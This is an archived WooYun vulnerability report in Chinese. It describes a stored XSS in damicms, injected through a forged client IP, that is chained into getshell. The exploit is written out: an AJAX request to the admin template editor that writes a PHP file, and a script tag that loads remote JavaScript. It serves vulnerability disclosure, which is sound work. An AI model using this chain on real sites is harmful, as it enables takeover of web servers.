当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081381

漏洞标题:damicms存储xss导致getshell

相关厂商:damicms.com

漏洞作者: wilson

提交时间:2014-11-01 10:50

修复时间:2014-12-30 14:44

公开时间:2014-12-30 14:44

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-01: 细节已通知厂商并且等待厂商处理中
2014-11-06: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-31: 细节向核心白帽子及相关领域专家公开
2015-01-10: 细节向普通白帽子公开
2015-01-20: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

damicms存储xss导致getshell

详细说明:

1)Xss
Damicms使用了万恶的
get_client_ip()
直接伪造ip,而且ip的字段是varchar(50) 够我xss了

6.PNG


然后:

5.PNG


Ok
2)xss导致getshell
由于后台 可以直接编辑文件,生成php马
那我们就用js来直接getshell
Js如下:
$.ajax({
"url": "http://192.168.153.132/dami/admin.php?s=/Tpl/Update",
"type": "POST",
"data": "filename=./Web/Tpl/w3g/list/4.php&content=<?php phpinfo();?>"
})
2.Payload:
<script src=//xxxxxx/1.js></script>

图片1.png


然后模拟管理员上线...
ok 成功getshell

图片2.png


漏洞证明:

见前面

修复方案:

对ip进行过滤

版权声明:转载请注明来源 wilson@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

最新状态:

2014-11-06:3.9已经修正